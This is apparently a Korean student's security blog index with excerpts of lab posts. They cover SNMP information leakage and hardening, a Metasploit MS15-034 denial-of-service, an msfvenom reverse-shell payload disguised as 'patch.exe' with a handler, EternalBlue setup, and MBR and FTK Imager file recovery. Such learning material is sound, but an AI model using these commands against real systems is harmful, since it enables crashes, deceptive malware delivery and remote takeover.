본문 바로가기

보안

(14)
SNMP 취약점을 통한 공격 Snmp는 Tcp/ip 네트워크 상에서 각 호스트에서 각 장비의 규격에 따라 정기적으로 여러 정보를 자동수집하여 네트워크 관리를 하는 역할을 한다. 그렇기 때문에 다양하고 많은 정보를 가지고 있게 된다. Snmp-check 1.0.0.100(공격대상)을 통해 정보 확인을 해보겠다. (보안 커뮤니티가 public일 경우 바로 정보가 드러난다.) 계정정보, 네트워크 정보, 라우팅 정보, 포트 정보가 다나온다. 보안상 좋지 않기 때문에 services.msc에서 snmp service을 들어간다. 속성에서 보안에서 public이 아닌 임의의 값으로 바꿔주는 것이 보안에 좋다. Public -> pub으로 바꿔 주겠다. 그렇게 되면 pub을 알지 못해 접속하지 못한다. 만약 커뮤니티를 public이 아닌데 알고..
칼리 리눅스 (강제 종료 공격) Msfconsole 실행 Ms15-034검색 1번 auxiliary/dos/http/ms15_034_ulonglongadd 사용! Show options 입력 (정보 확인)! Set rhosts 1.0.0.100 (공격 대상 지정)과 set targeturi welcome.png (웰컴 페이지 설정) 실행시키는 순간 공격대상에서 블루스크린이 뜨고 강제 재부팅이 실행됨을 볼 수 있다. (공격대상 입장)
칼리 리눅스(방화벽 on) 실행파일 이용 공격 공격대상이 방화벽이 on일 경우에는 어떤 방법이 있을까? 설치파일을 공격대상에게 보내서 사용자가 설치파일을 실행하게 되면 공격대상이 공격이 가능하게 한다. msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.11 lport=4444 -f exe -o /root/patch.exe의 명령어 실행! (홈 디렉토리에 포트 4444번을 쓰고 실행파일을 가진 patch.exe를 추가하겠다.) Msfconsole Use exploit/multi/handler (Payload(페이로드) 연결을 받고 Handle(다룰) 수 있는 Handler로 이동하여 줌) set payload windows/x64/meterprete..
칼리 리눅스(방화벽 off) 이터널블루 공격 이터널블루(EternalBlue, ETERNALBLUE[1])는 일반적으로 미국 국가안보국(NSA)에 의해 개발된 것으로 간주되는 취약점 공격 도구이다. 섀도 브로커스라는 해커 그룹이 2017년 4월 14일에 유출하였으며, 2017년 5월 12일에 전 세계 워너크라이 랜섬웨어 공격의 일부로 사용되었다 이터널블루 공격 (공격대상이 방화벽 off일떄) service postgresql start msfdb init(데이터베이스 초기화) msfconsole(콘솔창 진입) 이터널블루 검색하여 정보를 확인하였고 3번을 쓰겠다. Use exploit/windows/smb/ms17_010_eternalblue 여기서 reverse connection을 이용할 것이다. 이용하는 이유는 출처 : https://onyou..
MBR(Master Boot Record) MBR이란 간단하게 말해서 컴퓨터가 장착된 하드디스크의 정보를 확인하고 기동하기 위한 정보가 담긴 곳입니다. MBR, Partition, BR, Root Directory의 구조를 살펴보았습니다. (그림 1) ○ DUCKJIN이라는 가상 하드 디스크를 만든 후에 그 하드 디스크에 메모장에 애국가 1절을 적어 저장한 후 실수로 삭제한 상황을 가정하였습니다. 그 데이터를 hxd을 이용하여 데이터 복구를 해보았습니다. HXD를 관리자 권한으로 실행한 뒤 도구 -> 디스크 열기 -> 물리디스크에서 만든 가상의 디스크를 선택합니다. (읽기전용 열기 X) 열고 나면 여러가지가 보이는데 (그림 1)의 Partiton의 구조를 보고 LBA address가 위치한 4비트를 이용하여 MBR의 주소를 구하여 그 Sector..
FTK IMAGER 복구 ○ 내 PC에 생긴 DUCKJIN이라는 가상의 디스크에 1.JPEG파일을 하나 넣고 실수로 삭제를 했다고 가정해보겠습니다. FTK Imager을 실행한 후 File에서 ADD EVIDENCE ITEM에서 Logical Drive에서 새로 생긴 가상하드디스크 DUCKJIN을 클릭하고, FINSH를 한다. 하고 나면 FTK Imager에서 ROOT파일에 실수로 삭제했던 1.JPEG가 남아있음을 확인할 수 있다. (데이터 복구 확인) 바탕화면으로 드래그 하게 되면 데이터가 복구된다.